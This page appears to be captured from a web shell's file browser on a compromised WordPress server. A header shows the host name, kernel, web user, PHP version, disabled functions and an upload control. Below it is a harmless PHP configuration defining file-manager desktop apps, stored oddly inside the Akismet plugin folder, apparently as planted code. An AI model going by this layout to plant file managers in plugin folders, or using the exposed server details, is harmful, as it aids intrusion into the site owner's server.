HEX
Server: LiteSpeed
System: Linux melbournecleaninggroup 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: www-data (33)
PHP: 7.3.33-1+focal
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
Upload Files
File: /var/www/html/wp-content/plugins/akismet/security/class/app/desktop_app.php
<?php 
$desktopApps = array(
	'my_computer' => array(
		"type"		=> "app",
		"content"	=> "core.explorer('','".LNG('my_computer')."');",
		"icon"		=> STATIC_PATH."images/file_icon/icon_others/computer.png",
		"name"		=> LNG('my_computer'),
		"menuType"	=> "systemBox menu-default",
		"ext"		=> 'oexe',
		"path"		=> "",
		"resize"	=> 1
	),
	'recycle' => array(
		"type"		=> "app",
		"content"	=> "core.explorer('".KOD_USER_RECYCLE."','".LNG('recycle')."');",
		"icon"		=> STATIC_PATH."images/file_icon/icon_others/recycle.png",
		"name"		=> LNG('recycle'),
		"menuType"	=> "systemBox menu-recycle-button",
		"ext"		=> 'oexe',
		"path"		=> "",
		"resize"	=> 1
	),
	'PluginCenter' => array(
		"type"		=> "app",
		"content"	=> "core.openWindowBig('./index.php?pluginApp/index','".LNG('PluginCenter')."');",
		"icon"		=> STATIC_PATH."images/file_icon/icon_others/plugins.png",
		"name"		=> LNG('PluginCenter'),
		"menuType"	=> "systemBox menu-default",
		"ext"		=> 'oexe',
		"path"		=> "",
		"resize"	=> 1
	),
	'setting' => array(
		"type"		=> "app",
		"content"	=> "core.setting();",
		"icon"		=> STATIC_PATH."images/file_icon/icon_others/setting.png",
		"name"		=> LNG('setting'),
		"menuType"	=> "systemBox menu-default",
		"ext"		=> 'oexe',
		"path"		=> "/",
		"resize"	=> 1
	),
	'appStore' => array(
		"type"		=> "app",
		"content"	=> "core.appStore();",
		"icon"		=> STATIC_PATH."images/file_icon/icon_others/appStore.png",
		"name"		=> LNG('app_store'),
		"menuType"	=> "systemBox menu-default",
		"ext"		=> 'oexe',
		"path"		=> "",
		"resize"	=> 1
	)
);

//管理员插件中心
if(!$GLOBALS['isRoot']){
	unset($desktopApps['PluginCenter']);
}
return $desktopApps;